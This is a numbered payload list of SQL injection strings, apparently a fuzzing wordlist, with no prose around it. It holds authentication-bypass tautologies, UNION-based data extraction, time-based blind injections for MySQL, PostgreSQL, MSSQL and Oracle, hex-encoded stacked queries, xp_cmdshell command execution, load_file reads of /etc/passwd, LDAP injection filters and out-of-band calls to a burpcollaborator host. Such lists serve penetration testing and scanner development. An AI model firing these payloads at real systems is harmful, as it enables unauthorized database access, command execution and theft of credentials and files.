| /' or 1=1-- 671 | /' or '1'='1'-- 672 | /' or 1 --' 673 | /or 1=1-- 674 | /' or 1=1 or ''=' 675 | / or 1=1 or ""= 676 | /' or a=a-- 677 | / or a=a 678 | /') or ('a'='a 679 | /'hi' or 'x'='x'; 680 | /or 681 | /procedure 682 | /handler 683 | /' or username like '% 684 | /' or uname like '% 685 | /' or userid like '% 686 | /' or uid like '% 687 | /' or user like '% 688 | /'; exec master..xp_cmdshell 689 | /'; exec xp_regread 690 | /t'exec master..xp_cmdshell 'nslookup www.google.com'-- 691 | /--sp_password 692 | /' UNION SELECT 693 | /' UNION ALL SELECT 694 | /' or (EXISTS) 695 | /' (select top 1 696 | /'||UTL_HTTP.REQUEST 697 | /1;SELECT%20* 698 | /<>"'%;)(&+ 699 | /'%20or%201=1 700 | /'sqlattempt1 701 | /%28 702 | /%29 703 | /%26 704 | /%21 705 | /' or ''=' 706 | /' or 3=3 707 | / or 3=3 -- 708 | /')) or sleep(5)=' 709 | /;waitfor delay '0:0:5'-- 710 | /);waitfor delay '0:0:5'-- 711 | /';waitfor delay '0:0:5'-- 712 | /";waitfor delay '0:0:5'-- 713 | /');waitfor delay '0:0:5'-- 714 | /");waitfor delay '0:0:5'-- 715 | /));waitfor delay '0:0:5'-- 716 | /"> 717 | /0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z 718 | /; DECLARE @command varchar(255); SELECT @command='ping xxx.burpcollaborator.net'; EXEC Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP' 719 | / 720 | /%3C%22img src='https://xxx.burpcollaborator.net'%22%3E 721 | x/admin'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))-- 722 | x/-6513%27%20OR%20%28SELECT%20INSTR2%28NULL%2CNULL%29%20FROM%20DUAL%29%20IS%20NULL--%20SpSw 723 | x/admin%20waitfor%20delay%20'0:0:15'%20--%20 724 | x/admin%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 725 | x/admin%20OR%202%2B669-669-1=0%2B0%2B0%2B1 726 | x/admin"%20OR%202%2B764-764-1=0%2B0%2B0%2B1%20--%20 727 | x/'xor(if(now()=sysdate(),sleep(30),0))or 728 | x/admin@admin.com'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 729 | x/orwa(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 730 | x/if(now()=sysdate()%2Csleep(15)%2C0) 731 | x/admin';%20waitfor%20delay%20'0:0:15'%20--%20 732 | x/admin'%20OR%20227=(SELECT%20227%20FROM%20PG_SLEEP(15))-- 733 | x/admin')%20OR%20565=(SELECT%20565%20FROM%20PG_SLEEP(15))-- 734 | x/1%00%C0%A7%C0%A2%252527%252522 735 | x/admin'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 736 | x/(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 737 | x/gGBw={vsCx}&firc=< 738 | x/orwa';%20waitfor%20delay%20'0:0:15'%20--%20 739 | x/if(now()=sysdate()%2Csleep(15)%2C0) 740 | x/c4aQYcql 741 | x/1%20waitfor%20delay%20'0:0:15'%20--%20 742 | x/1%20waitfor%20delay%20'0:0:15'%20--%20 743 | x/1%00%C0%A7%C0%A2%252527%252522 744 | x/0%27XOR(if(now()=sysdate(),sleep(11),0))XOR%27Z 745 | x/orwa'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z 746 | x/orwa"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z 747 | x/orwa-1"%20OR%202%2B804-804-1=0%2B0%2B0%2B1%20--%20 748 | x/(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 749 | x/%40%40KFdwo 750 | x/u]H[ww6KrA9F.x-F'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 751 | x/orwa@orwa.com'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 752 | x/orwa%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 753 | x/admin');%20waitfor%20delay%20'0:0:9' 754 | x/'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or 755 | x/orwa')%20OR%20565=(SELECT%20565%20FROM%20PG_SLEEP(15))-- 756 | x/orwa'%20OR%20227=(SELECT%20227%20FROM%20PG_SLEEP(15))-- 757 | x/orwa';%20waitfor%20delay%20'0:0:15'%20--%20 758 | x/1%20AND%20(SELECT%208603%20FROM%20(SELECT(SLEEP(10)))xMdQ) 759 | x/xx49236287'%20or%208896=8896-- 760 | x/1)%20OR%20ELT(2023=2023,SLEEP(5))# 761 | x/orwa'%20OR%201=1-- 762 | x/(SELECT%20(CASE%20WHEN%20(9967=9967)%20THEN%2010%20ELSE%20(SELECT%204619%20UNION%20SELECT%207284)%20END)) 763 | x/10%20AND%20(SELECT%201030%20FROM(SELECT%20COUNT(*),CONCAT(0x7176717071,(SELECT%20(ELT(1030=1030,1))),0x7176717871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) 764 | x/10%20AND%20(SELECT%204814%20FROM%20(SELECT(SLEEP(5)))jQqq) 765 | x/10%20UNION%20ALL%20SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x6a70787a43525a4e7563646951517a696944624150465361476541455147435a536c775142586976,0x7176717871)-- - 766 | x/+or+sleep(0.2)%23) 767 | x/-1;%20waitfor%20delay%20'0:0:10'%20--%20 768 | x/if(now()=sysdate()%2Csleep(15)%2C0) 769 | x/Be7BtCuD'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))-- 770 | x/20PVEY5L 771 | x/orwa'" 772 | x/1;SELECT IF((8303>8302),SLEEP(13),2356)# 773 | x/orwa%27;%20waitfor%20delay%20%270:0:5%27%20--%20 774 | x/orwa%27);%20waitfor%20delay%20%270:0:6%27%20--%20 775 | x/1%20waitfor%20delay%20'0:0:15'%20--%20 776 | x/1%00%C0%A7%C0%A2%252527%252522 777 | x/0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z 778 | x/0"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z 779 | x/-1'%20OR%202%2B388-388-1=0%2B0%2B0%2B1%20--%20 780 | x/-1'%20OR%202%2B251-251-1=0%2B0%2B0%2B1%20or%20'4dbGgO0h'=' 781 | x/-1%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 782 | x/-1%20OR%202%2B669-669-1=0%2B0%2B0%2B1 783 | x/-1"%20OR%202%2B764-764-1=0%2B0%2B0%2B1%20--%20 784 | x/(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 785 | x/(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 786 | x/%40%408orwa 787 | x/)%20or%20('x'='x 788 | x/%20or%201=1 789 | x/(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 790 | x/orwa';%20waitfor%20delay%20'0:0:6'%20--%20 791 | x/orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- 792 | x/(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'\"+(select(0)from(select(sleep(13)))v)+\"*/ 793 | x/'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||' 794 | x/' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)-- 795 | x/; execute immediate 'sel' || 'ect us' || 'er' 796 | x/benchmark(10000000,MD5(1))# 797 | x/1' OR NOT 2470=2470-- Ontu 798 | x/' WAITFOR DELAY '0:0:5'-- 799 | x/';WAITFOR DELAY '0:0:5'-- 800 | x/')) or sleep(5)=' 801 | x/;waitfor delay '0:0:5'-- 802 | x/);waitfor delay '0:0:5'-- 803 | x/';waitfor delay '0:0:5'-- 804 | x/";waitfor delay '0:0:5'-- 805 | x/');waitfor delay '0:0:5'-- 806 | x/");waitfor delay '0:0:5'-- 807 | x/));waitfor delay '0:0:5'-- 808 | x/";waitfor delay '0:0:__TIME__'-- 809 | x/1) or pg_sleep(__TIME__)-- 810 | x/||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 811 | x/"hi"") or (""a""=""a" 812 | x/" or sleep(__TIME__)# 813 | x/pg_sleep(__TIME__)-- 814 | x/*(|(objectclass=*)) 815 | x/declare @q nvarchar (200) 0x730065006c00650063 ... 816 | x/ or 0=0 # 817 | x/insert 818 | x/1) or sleep(__TIME__)# 819 | x/) or ('a'='a 820 | x/; exec xp_regread 821 | x/*| 822 | x/@var select @var as var into temp end -- 823 | x/1)) or benchmark(10000000,MD5(1))# 824 | x/asc 825 | x/(||6) 826 | x/"a"" or 3=3--" 827 | x/" or benchmark(10000000,MD5(1))# 828 | x/# from wapiti 829 | x/ or 0=0 -- 830 | x/1 waitfor delay '0:0:10'-- 831 | x/ or 'a'='a 832 | x/hi or 1=1 --" 833 | x/or a = a 834 | x/ UNION ALL SELECT 835 | x/) or sleep(__TIME__)=' 836 | x/)) or benchmark(10000000,MD5(1))# 837 | x/hi' or 'a'='a 838 | x/0 839 | x/21 % 840 | x/limit 841 | x/ or 1=1 842 | x/ or 2 > 1 843 | x/")) or benchmark(10000000,MD5(1))# 844 | x/PRINT 845 | x/hi') or ('a'='a 846 | x/ or 3=3 847 | x/));waitfor delay '0:0:__TIME__'-- 848 | x/a' waitfor delay '0:0:10'-- 849 | x/1;(load_file(char(47,101,116,99,47,112,97,115, ... 850 | x/or%201=1 851 | x/1 or sleep(__TIME__)# 852 | x/or 1=1 853 | x/ and 1 in (select var from temp)-- 854 | x/ or '7659'='7659 855 | x/ or 'text' = n'text' 856 | x/ -- 857 | x/ or 1=1 or ''=' 858 | x/declare @s varchar (200) select @s = 0x73656c6 ... 859 | x/exec xp 860 | x/; exec master..xp_cmdshell 'ping 172.10.1.255'-- 861 | x/3.10E+17 862 | x/" or pg_sleep(__TIME__)-- 863 | x/x' AND email IS NULL; -- 864 | x/& 865 | x/admin' or ' 866 | x/ or 'unusual' = 'unusual' 867 | x/// 868 | x/truncate 869 | x/1) or benchmark(10000000,MD5(1))# 870 | x/\x27UNION SELECT 871 | x/declare @s varchar(200) select @s = 0x77616974 ... 872 | x/tz_offset 873 | x/sqlvuln 874 | x/"));waitfor delay '0:0:__TIME__'-- 875 | x/||6 876 | x/or%201=1 -- 877 | x/%2A%28%7C%28objectclass%3D%2A%29%29 878 | x/or a=a 879 | x/) union select * from information_schema.tables; 880 | x/PRINT @@variable 881 | x/or isNULL(1/0) /* 882 | x/26 % 883 | x/" or "a"="a 884 | x/(sqlvuln) 885 | x/x' AND members.email IS NULL; -- 886 | x/ or 1=1-- 887 | x/ and 1=( if((load_file(char(110,46,101,120,11 ... 888 | x/0x770061006900740066006F0072002000640065006C00 ... 889 | x/%20'sleep%2050' 890 | x/as 891 | x/1)) or pg_sleep(__TIME__)-- 892 | x//**/or/**/1/**/=/**/1 893 | x/ union all select @@version-- 894 | x/,@variable 895 | x/(sqlattempt2) 896 | x/ or (EXISTS) 897 | x/t'exec master..xp_cmdshell 'nslookup www.googl ... 898 | x/%20$(sleep%2050) 899 | x/1 or benchmark(10000000,MD5(1))# 900 | x/%20or%20''=' 901 | x/||UTL_HTTP.REQUEST 902 | x/ or pg_sleep(__TIME__)-- 903 | x/hi' or 'x'='x'; 904 | x/") or sleep(__TIME__)=" 905 | x/ or 'whatever' in ('whatever') 906 | x/; begin declare @var varchar(8000) set @var=' ... 907 | x/ union select 1,load_file('/etc/passwd'),1,1,1; 908 | x/0x77616974666F722064656C61792027303A303A313027 ... 909 | x/exec(@s) 910 | x/) or pg_sleep(__TIME__)-- 911 | x/ union select 912 | x/ or sleep(__TIME__)# 913 | x/ select * from information_schema.tables-- 914 | x/a' or 1=1-- 915 | x/a' or 'a' = 'a 916 | x/declare @s varchar(22) select @s = 917 | x/ or 2 between 1 and 3 918 | x/ or a=a-- 919 | x/ or '1'='1 920 | x/| 921 | x/ or sleep(__TIME__)=' 922 | x/ or 1 --' 923 | x/or 0=0 #" 924 | x/having 925 | x/a' 926 | x/" or isNULL(1/0) /* 927 | x/declare @s varchar (8000) select @s = 0x73656c ... 928 | x/‘ or 1=1 -- 929 | x/char%4039%41%2b%40SELECT 930 | x/order by 931 | x/bfilename 932 | x/ having 1=1-- 933 | x/) or benchmark(10000000,MD5(1))# 934 | x/ or username like char(37); 935 | x/;waitfor delay '0:0:__TIME__'-- 936 | x/" or 1=1-- 937 | x/x' AND userid IS NULL; -- 938 | x/*/* 939 | x/ or 'text' > 't' 940 | x/ (select top 1 941 | x/ or benchmark(10000000,MD5(1))# 942 | x/");waitfor delay '0:0:__TIME__'-- 943 | x/a' or 3=3-- 944 | x/ -- &password= 945 | x/ group by userid having 1=1-- 946 | x/ or ''=' 947 | x/; exec master..xp_cmdshell 948 | x/%20or%20x=x 949 | x/select 950 | x/")) or sleep(__TIME__)=" 951 | x/0x730065006c0065006300740020004000400076006500 ... 952 | x/hi' or 1=1 -- 953 | x/") or pg_sleep(__TIME__)-- 954 | x/%20or%20'x'='x 955 | x/ or 'something' = 'some'+'thing' 956 | x/exec sp 957 | x/29 % 958 | x/( 959 | x/ý or 1=1 -- 960 | x/1 or pg_sleep(__TIME__)-- 961 | x/0 or 1=1 962 | x/) or (a=a 963 | x/uni/**/on sel/**/ect 964 | x/replace 965 | x/%27%20or%201=1 966 | x/)) or pg_sleep(__TIME__)-- 967 | x/%7C 968 | x/x' AND 1=(SELECT COUNT(*) FROM tabname); -- 969 | x/'%20OR 970 | x/; or '1'='1' 971 | x/declare @q nvarchar (200) select @q = 0x770061 ... 972 | x/1 or 1=1 973 | x/; exec ('sel' + 'ect us' + 'er') 974 | x/23 OR 1=1 975 | x// 976 | x/anything' OR 'x'='x 977 | x/declare @q nvarchar (4000) select @q = 978 | x/or 0=0 -- 979 | x/desc 980 | x/||'6 981 | x/) 982 | x/1)) or sleep(__TIME__)# 983 | x/or 0=0 # 984 | x/ select name from syscolumns where id = (sele ... 985 | x/hi or a=a 986 | x/*(|(mail=*)) 987 | x/password:*/=1-- 988 | x/distinct 989 | x/);waitfor delay '0:0:__TIME__'-- 990 | x/to_timestamp_tz 991 | x/") or benchmark(10000000,MD5(1))# 992 | x/ UNION SELECT 993 | x/%2A%28%7C%28mail%3D%2A%29%29 994 | x/+sqlvuln 995 | x/ or 1=1 /* 996 | x/)) or sleep(__TIME__)=' 997 | x/or 1=1 or ""= 998 | x/ or 1 in (select @@version)-- 999 | x/sqlvuln; 1000 | x/ union select * from users where login = char ... 1001 | x/x' or 1=1 or 'x'='y 1002 | x/28 % 1003 | x/‘ or 3=3 -- 1004 | x/@variable 1005 | x/ or '1'='1'-- 1006 | x/"a"" or 1=1--" 1007 | x///* 1008 | x/%2A%7C 1009 | x/" or 0=0 -- 1010 | x/")) or pg_sleep(__TIME__)-- 1011 | x/? 1012 | x/ or 1/* 1013 | x/! 1014 | x/' 1015 | x/ or a = a 1016 | x/declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 1017 | x/declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 1018 | x/declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 1019 | x/declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 1020 | x/' or 1=1 1021 | x/ or 1=1 -- 1022 | x/x' OR full_name LIKE '%Bob% 1023 | x/'; exec master..xp_cmdshell 'ping 172.10.1.255'-- 1024 | x/'%20or%20''=' 1025 | x/'%20or%20'x'='x 1026 | x/')%20or%20('x'='x 1027 | x/' or 0=0 -- 1028 | x/' or 0=0 # 1029 | x/ or 0=0 #" 1030 | x/' or 1=1-- 1031 | x/' or '1'='1'-- 1032 | x/' or 1 --' 1033 | x/or 1=1-- 1034 | x/' or 1=1 or ''=' 1035 | x/ or 1=1 or ""= 1036 | x/' or a=a-- 1037 | x/ or a=a 1038 | x/') or ('a'='a 1039 | x/'hi' or 'x'='x'; 1040 | x/or 1041 | x/procedure 1042 | x/handler 1043 | x/' or username like '% 1044 | x/' or uname like '% 1045 | x/' or userid like '% 1046 | x/' or uid like '% 1047 | x/' or user like '% 1048 | x/'; exec master..xp_cmdshell 1049 | x/'; exec xp_regread 1050 | x/t'exec master..xp_cmdshell 'nslookup www.google.com'-- 1051 | x/--sp_password 1052 | x/' UNION SELECT 1053 | x/' UNION ALL SELECT 1054 | x/' or (EXISTS) 1055 | x/' (select top 1 1056 | x/'||UTL_HTTP.REQUEST 1057 | x/1;SELECT%20* 1058 | x/<>"'%;)(&+ 1059 | x/'%20or%201=1 1060 | x/'sqlattempt1 1061 | x/%28 1062 | x/%29 1063 | x/%26 1064 | x/%21 1065 | x/' or ''=' 1066 | x/' or 3=3 1067 | x/ or 3=3 -- 1068 | x/')) or sleep(5)=' 1069 | x/;waitfor delay '0:0:5'-- 1070 | x/);waitfor delay '0:0:5'-- 1071 | x/';waitfor delay '0:0:5'-- 1072 | x/";waitfor delay '0:0:5'-- 1073 | x/');waitfor delay '0:0:5'-- 1074 | x/");waitfor delay '0:0:5'-- 1075 | x/));waitfor delay '0:0:5'-- 1076 | x/"> 1077 | x/0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z 1078 | x/; DECLARE @command varchar(255); SELECT @command='ping xxx.burpcollaborator.net'; EXEC Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP' 1079 | x/ 1080 | x/%3C%22img src='https://xxx.burpcollaborator.net'%22%3E 1081 | --------------------------------------------------------------------------------